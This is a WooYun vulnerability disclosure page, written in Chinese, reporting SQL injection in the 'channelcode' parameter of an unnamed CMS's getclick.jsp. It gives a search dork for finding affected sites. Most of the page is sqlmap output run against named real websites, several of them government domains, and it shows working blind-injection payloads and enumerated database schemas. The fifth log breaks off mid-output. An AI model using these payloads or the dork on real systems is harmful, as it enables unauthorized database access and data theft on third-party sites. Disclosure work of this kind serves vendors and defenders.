当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070227

漏洞标题:某不知名的cms建站系统一处sql注入

相关厂商:某不知名的cms

漏洞作者: Mosuan

提交时间:2014-07-30 15:17

修复时间:2014-10-28 15:18

公开时间:2014-10-28 15:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-30: 细节已通知厂商并且等待厂商处理中
2014-08-04: 厂商已经确认,细节仅向厂商公开
2014-08-07: 细节向第三方安全合作伙伴开放
2014-09-28: 细节向核心白帽子及相关领域专家公开
2014-10-08: 细节向普通白帽子公开
2014-10-18: 细节向实习白帽子公开
2014-10-28: 细节向公众公开

简要描述:

rt

详细说明:


关键词

inurl:getclick.jsp?infoid=


有点网站跑出来是500错误,现在我举例7个网站吧。
第一个

注入地址:http://www.c-ncap.org.cn/cms/cms/infopub/getclick.jsp?infoid=1192494709
507268&channelcode=A060301
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:33:40
[23:33:40] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.c-ncap.org.cn\session' as session file
[23:33:40] [INFO] testing connection to the target url
[23:33:41] [INFO] testing if the url is stable, wait a few seconds
[23:33:42] [INFO] url is stable
[23:33:42] [INFO] testing if GET parameter 'infoid' is dynamic
[23:33:42] [INFO] confirming that GET parameter 'infoid' is dynamic
[23:33:43] [WARNING] GET parameter 'infoid' appears to be not dynamic
[23:33:43] [WARNING] heuristic test shows that GET parameter 'infoid' might not
be injectable
[23:33:43] [INFO] testing sql injection on GET parameter 'infoid'
[23:33:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:33:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:33:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:33:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[23:33:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:33:53] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:33:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:33:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:33:57] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:33:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:34:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:34:01] [INFO] testing 'Oracle AND time-based blind'
[23:34:04] [INFO] GET parameter 'infoid' is 'Oracle AND time-based blind' inject
able
[23:34:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:34:08] [INFO] checking if the injection point on GET parameter 'infoid' is a
false positive
[23:34:09] [WARNING] false positive or unexploitable injection point detected
[23:34:09] [WARNING] GET parameter 'infoid' is not injectable
[23:34:09] [INFO] testing if GET parameter 'channelcode' is dynamic
[23:34:10] [INFO] confirming that GET parameter 'channelcode' is dynamic
[23:34:10] [INFO] GET parameter 'channelcode' is dynamic
[23:34:10] [WARNING] heuristic test shows that GET parameter 'channelcode' might
not be injectable
[23:34:10] [INFO] testing sql injection on GET parameter 'channelcode'
[23:34:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:34:13] [INFO] GET parameter 'channelcode' is 'AND boolean-based blind - WHER
E or HAVING clause' injectable
[23:34:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:34:13] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:34:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[23:34:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:34:15] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:34:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:34:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:34:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:34:17] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:34:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:34:18] [INFO] testing 'Oracle AND time-based blind'
[23:34:28] [INFO] GET parameter 'channelcode' is 'Oracle AND time-based blind' i
njectable
[23:34:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:34:29] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[23:34:34] [INFO] target url appears to have 1 columns in query
[23:34:36] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
GET parameter 'channelcode' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] y
sqlmap identified the following injection points with a total of 101 HTTP(s) req
uests:
---
Place: GET
Parameter: channelcode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: infoid=1192494709507268&channelcode=A060301' AND 7185=7185 AND 'ovo
b'='ovob
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: infoid=1192494709507268&channelcode=A060301' AND 8687=DBMS_PIPE.REC
EIVE_MESSAGE(CHR(82)||CHR(115)||CHR(65)||CHR(101),5) AND 'tCAY'='tCAY
---
[23:34:38] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[23:34:38] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[23:34:38] [INFO] fetching database (schema) names
[23:34:38] [INFO] fetching number of databases
[23:34:38] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[23:34:38] [INFO] retrieved: 27
[23:34:53] [INFO] retrieved: AUTOINFOCMS
[23:36:52] [INFO] retrieved: CATARC031
[23:38:00] [INFO] retrieved: CATARCOA
[23:39:03] [INFO] retrieved: CMS
[23:39:30] [INFO] retrieved: CMSSEARCH
[23:40:38] [INFO] retrieved: CTXSYS
[23:41:29] [INFO] retrieved: DBSNMP
[23:42:15] [INFO] retrieved: DMSYS
[23:42:56] [INFO] retrieved: EXFSYS
[23:43:42] [INFO] retrieved: FORUM
[23:44:20] [INFO] retrieved: HR
[23:44:39] [INFO] retrieved: HZSEARCH
[23:45:41] [INFO] retrieved: IX
[23:46:01] [INFO] retrieved: MDSYS
[23:46:39] [INFO] retrieved: OE
[23:47:00] [INFO] retrieved: OLAPSYS
[23:47:58] [INFO] retrieved: ORDSYS
[23:48:44] [INFO] retrieved: OUTLN
[23:49:26] [INFO] retrieved: PM
[23:49:46] [INFO] retrieved: SCOTT
[23:50:32] [INFO] retrieved: SH
[23:51:01] [INFO] retrieved: SYS
[23:51:33] [INFO] retrieved: SYSMAN
[23:52:29] [INFO] retrieved: SYSTEM
[23:53:38] [INFO] retrieved: TSMSYS
[23:54:38] [INFO] retrieved: WMSYS
[23:55:25] [INFO] retrieved: XDB
available databases [27]:
[*] AUTOINFOCMS
[*] CATARC031
[*] CATARCOA
[*] CMS
[*] CMSSEARCH
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] FORUM
[*] HR
[*] HZSEARCH
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[23:56:10] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 2 times
[23:56:10] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.c-ncap.org.cn'
[*] shutting down at 23:56:10


第二个

注入地址:http://www.hncz.gov.cn:7017/cms/cms/infopub/getclick.jsp?infoid=1365575
390452904&channelcode=H601001
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:40:15
[23:40:15] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.hncz.gov.cn\session' as session file
[23:40:15] [INFO] testing connection to the target url
[23:40:15] [INFO] testing if the url is stable, wait a few seconds
[23:40:17] [INFO] url is stable
[23:40:17] [INFO] testing if GET parameter 'infoid' is dynamic
[23:40:17] [INFO] confirming that GET parameter 'infoid' is dynamic
[23:40:17] [WARNING] GET parameter 'infoid' appears to be not dynamic
[23:40:18] [WARNING] heuristic test shows that GET parameter 'infoid' might not
be injectable
[23:40:18] [INFO] testing sql injection on GET parameter 'infoid'
[23:40:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:40:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:40:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:40:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[23:40:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:40:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:40:30] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:40:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:40:36] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:40:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:40:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:40:40] [INFO] testing 'Oracle AND time-based blind'
[23:40:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:41:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:41:03] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[23:41:24] [WARNING] GET parameter 'infoid' is not injectable
[23:41:24] [INFO] testing if GET parameter 'channelcode' is dynamic
[23:41:24] [INFO] confirming that GET parameter 'channelcode' is dynamic
[23:41:24] [INFO] GET parameter 'channelcode' is dynamic
[23:41:25] [WARNING] heuristic test shows that GET parameter 'channelcode' might
not be injectable
[23:41:25] [INFO] testing sql injection on GET parameter 'channelcode'
[23:41:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:41:30] [INFO] GET parameter 'channelcode' is 'AND boolean-based blind - WHER
E or HAVING clause' injectable
[23:41:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:41:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:41:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[23:41:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:41:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:41:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:41:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:41:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:41:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:41:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:41:33] [INFO] testing 'Oracle AND time-based blind'
[23:41:44] [INFO] GET parameter 'channelcode' is 'Oracle AND time-based blind' i
njectable
[23:41:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:41:45] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[23:41:48] [INFO] target url appears to have 1 columns in query
[23:41:48] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
GET parameter 'channelcode' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] y
sqlmap identified the following injection points with a total of 185 HTTP(s) req
uests:
---
Place: GET
Parameter: channelcode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: infoid=1365575390452904&channelcode=H601001' AND 4056=4056 AND 'lpb
f'='lpbf
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: infoid=1365575390452904&channelcode=H601001' AND 9027=DBMS_PIPE.REC
EIVE_MESSAGE(CHR(100)||CHR(86)||CHR(100)||CHR(112),5) AND 'CyiY'='CyiY
---
[23:42:09] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP, JSP 2.1
back-end DBMS: Oracle
[23:42:09] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[23:42:09] [INFO] fetching database (schema) names
[23:42:09] [INFO] fetching number of databases
[23:42:09] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[23:42:09] [INFO] retrieved: 26
[23:42:17] [INFO] retrieved: BITEST
[23:43:00] [INFO] retrieved: CAUSER
[23:43:38] [INFO] retrieved: CTXSYS
[23:44:15] [INFO] retrieved: CZZJK
[23:44:47] [INFO] retrieved: DBSNMP
[23:45:32] [INFO] retrieved: DMSYS
[23:46:05] [INFO] retrieved: EXFSYS
[23:46:42] [INFO] retrieved: HNCG
[23:47:11] [INFO] retrieved: HNCGTEST
[23:48:05] [INFO] retrieved: HNGPA
[23:48:38] [INFO] retrieved: HNGPBI
[23:49:19] [INFO] retrieved: HNGPBI_DB
[23:50:22] [INFO] retrieved: HNGPBI_PTDB
[23:51:45] [INFO] retrieved: HNGPCMS
[23:52:41] [INFO] retrieved: HNPO
[23:53:26] [INFO] retrieved: MDSYS
[23:54:03] [INFO] retrieved: OLAPSYS
[23:55:07] [INFO] retrieved: ORDSYS
[23:56:02] [INFO] retrieved: OUTLN
[23:56:50] [INFO] retrieved: SPOTLIGHT
[23:58:02] [INFO] retrieved: SYS
[23:58:41] [INFO] retrieved: SYSMAN
[23:59:30] [INFO] retrieved: SYSTEM
[00:00:07] [INFO] retrieved: TSMSYS
[00:00:43] [INFO] retrieved: WMSYS
[00:01:16] [INFO] retrieved: XDB
available databases [26]:
[*] BITEST
[*] CAUSER
[*] CTXSYS
[*] CZZJK
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HNCG
[*] HNCGTEST
[*] HNGPA
[*] HNGPBI
[*] HNGPBI_DB
[*] HNGPBI_PTDB
[*] HNGPCMS
[*] HNPO
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SPOTLIGHT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[00:01:37] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 2 times
[00:01:37] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.hncz.gov.cn'
[*] shutting down at 00:01:37


第三个

注入地址:http://www.zhongmu.gov.cn/cms/cms/infopub/getclick.jsp?infoid=131503152
6046927&channelcode=A090206
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:35:55
[23:35:55] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.zhongmu.gov.cn\session' as session file
[23:35:55] [INFO] testing connection to the target url
[23:35:55] [INFO] testing if the url is stable, wait a few seconds
[23:35:57] [INFO] url is stable
[23:35:57] [INFO] testing if GET parameter 'infoid' is dynamic
[23:35:58] [INFO] confirming that GET parameter 'infoid' is dynamic
[23:35:58] [WARNING] GET parameter 'infoid' appears to be not dynamic
[23:35:58] [WARNING] heuristic test shows that GET parameter 'infoid' might not
be injectable
[23:35:58] [INFO] testing sql injection on GET parameter 'infoid'
[23:35:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:36:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:36:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:36:23] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[23:36:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:36:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:36:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:36:50] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:36:52] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:36:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:36:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:36:56] [INFO] testing 'Oracle AND time-based blind'
[23:36:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:37:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:37:42] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[23:38:39] [WARNING] GET parameter 'infoid' is not injectable
[23:38:39] [INFO] testing if GET parameter 'channelcode' is dynamic
[23:38:40] [INFO] confirming that GET parameter 'channelcode' is dynamic
[23:38:40] [INFO] GET parameter 'channelcode' is dynamic
[23:38:41] [WARNING] heuristic test shows that GET parameter 'channelcode' might
not be injectable
[23:38:41] [INFO] testing sql injection on GET parameter 'channelcode'
[23:38:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:38:44] [INFO] GET parameter 'channelcode' is 'AND boolean-based blind - WHER
E or HAVING clause' injectable
[23:38:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:38:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:38:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[23:38:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:38:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:38:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:38:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:38:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:38:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:38:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:38:57] [INFO] testing 'Oracle AND time-based blind'
[23:39:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:39:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:39:14] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[23:39:15] [INFO] target url appears to have 1 columns in query
[23:39:16] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
[23:39:16] [INFO] checking if the injection point on GET parameter 'channelcode'
is a false positive
GET parameter 'channelcode' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] y
sqlmap identified the following injection points with a total of 199 HTTP(s) req
uests:
---
Place: GET
Parameter: channelcode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: infoid=1315031526046927&channelcode=A090206' AND 7509=7509 AND 'yXV
V'='yXVV
---
[23:39:21] [INFO] testing MySQL
[23:39:21] [WARNING] the back-end DBMS is not MySQL
[23:39:21] [INFO] testing Oracle
[23:39:22] [INFO] confirming Oracle
[23:39:22] [INFO] the back-end DBMS is Oracle
web application technology: Apache 2.0.63, JSP
back-end DBMS: Oracle
[23:39:22] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[23:39:22] [INFO] fetching database (schema) names
[23:39:22] [INFO] fetching number of databases
[23:39:22] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[23:39:22] [INFO] retrieved: 19
[23:39:30] [INFO] retrieved: CMSADMIN
[23:42:05] [INFO] retrieved: CMSSEARCH
[23:44:49] [INFO] retrieved: CTXSYS
[23:46:46] [INFO] retrieved: DBSNMP
[23:48:48] [INFO] retrieved: DMSYS
[23:50:31] [INFO] retrieved: EXFSYS
[23:52:41] [INFO] retrieved: GIPS
[23:54:16] [INFO] retrieved: GIPSADMIN
[23:57:35] [INFO] retrieved: MDSYS
[23:59:27] [INFO] retrieved: OLAPSYS
[00:01:41] [INFO] retrieved: ORDSYS
[00:03:51] [INFO] retrieved: OUTLN
[00:05:36] [INFO] retrieved: SCOTT
[00:07:16] [INFO] retrieved: SYS
[00:08:22] [INFO] retrieved: SYSMAN
[00:10:34] [INFO] retrieved: SYSTEM
[00:12:51] [INFO] retrieved: TSMSYS
[00:14:51] [INFO] retrieved: WMSYS
[00:16:39] [INFO] retrieved: XDB
available databases [19]:
[*] CMSADMIN
[*] CMSSEARCH
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GIPS
[*] GIPSADMIN
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[00:17:48] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 2 times
[00:17:48] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.zhongmu.gov.cn'
[*] shutting down at 00:17:48


第四个

注入地址:http://www.chinahuangshan.gov.cn/cms/cms/infopub/getclick.jsp?infoid=13
15386238882253&channelcode=A09080905
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:46:30
[23:46:30] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.chinahuangshan.gov.cn\session' as session file
[23:46:30] [INFO] testing connection to the target url
[23:46:31] [INFO] testing if the url is stable, wait a few seconds
[23:46:32] [INFO] url is stable
[23:46:32] [INFO] testing if GET parameter 'infoid' is dynamic
[23:46:32] [INFO] confirming that GET parameter 'infoid' is dynamic
[23:46:33] [WARNING] GET parameter 'infoid' appears to be not dynamic
[23:46:33] [WARNING] heuristic test shows that GET parameter 'infoid' might not
be injectable
[23:46:33] [INFO] testing sql injection on GET parameter 'infoid'
[23:46:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:46:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:46:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:46:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[23:46:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:46:40] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:46:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:46:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:46:44] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:46:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:46:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:46:47] [INFO] testing 'Oracle AND time-based blind'
[23:46:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:47:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:47:05] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[23:47:36] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[23:47:42] [WARNING] GET parameter 'infoid' is not injectable
[23:47:42] [INFO] testing if GET parameter 'channelcode' is dynamic
[23:47:42] [INFO] confirming that GET parameter 'channelcode' is dynamic
[23:47:42] [INFO] GET parameter 'channelcode' is dynamic
[23:47:43] [WARNING] heuristic test shows that GET parameter 'channelcode' might
not be injectable
[23:47:43] [INFO] testing sql injection on GET parameter 'channelcode'
[23:47:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:47:45] [INFO] GET parameter 'channelcode' is 'AND boolean-based blind - WHER
E or HAVING clause' injectable
[23:47:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:47:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:47:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[23:47:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:47:47] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:47:47] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:47:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:47:48] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:47:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:47:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:47:48] [INFO] testing 'Oracle AND time-based blind'
[23:47:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:47:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:48:00] [INFO] checking if the injection point on GET parameter 'channelcode'
is a false positive
GET parameter 'channelcode' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] y
sqlmap identified the following injection points with a total of 197 HTTP(s) req
uests:
---
Place: GET
Parameter: channelcode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: infoid=1315386238882253&channelcode=A09080905' AND 4148=4148 AND 'f
mXd'='fmXd
---
[23:48:03] [INFO] testing MySQL
[23:48:03] [WARNING] the back-end DBMS is not MySQL
[23:48:03] [INFO] testing Oracle
[23:48:03] [INFO] confirming Oracle
[23:48:03] [INFO] the back-end DBMS is Oracle
web application technology: JSP, Apache 2.2.16
back-end DBMS: Oracle
[23:48:03] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[23:48:03] [INFO] fetching database (schema) names
[23:48:03] [INFO] fetching number of databases
[23:48:03] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[23:48:03] [INFO] retrieved: 17
[23:48:09] [INFO] retrieved: CMSADMIN
[23:48:46] [INFO] retrieved: CMSNEW
[23:49:18] [INFO] retrieved: CTXSYS
[23:49:52] [INFO] retrieved: DBSNMP
[23:50:28] [INFO] retrieved: DMSYS
[23:51:11] [INFO] retrieved: EXFSYS
[23:51:43] [INFO] retrieved: MDSYS
[23:52:11] [INFO] retrieved: OLAPSYS
[23:52:57] [INFO] retrieved: ORDSYS
[23:53:40] [INFO] retrieved: OUTLN
[23:54:10] [INFO] retrieved: SCOTT
[23:54:59] [INFO] retrieved: SYS
[23:55:16] [INFO] retrieved: SYSMAN
[23:56:06] [INFO] retrieved: SYSTEM
[23:56:52] [INFO] retrieved: TSMSYS
[23:57:40] [INFO] retrieved: WMSYS
[23:58:07] [INFO] retrieved: XDB
available databases [17]:
[*] CMSADMIN
[*] CMSNEW
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[23:58:41] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 70 times, 500 (Internal Server Error) - 2 times
[23:58:41] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.chinahuangshan.gov.cn'
[*] shutting down at 23:58:41


第五个

注入地址:http://www.zysy.org.cn/cms/cms/infopub/getclick.jsp?infoid=129859110970
4843&channelcode=A07170501
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:54:45
[23:54:45] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.zysy.org.cn\session' as session file
[23:54:45] [INFO] resuming back-end DBMS 'microsoft sql server 2000' from sessio
n file
[23:54:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
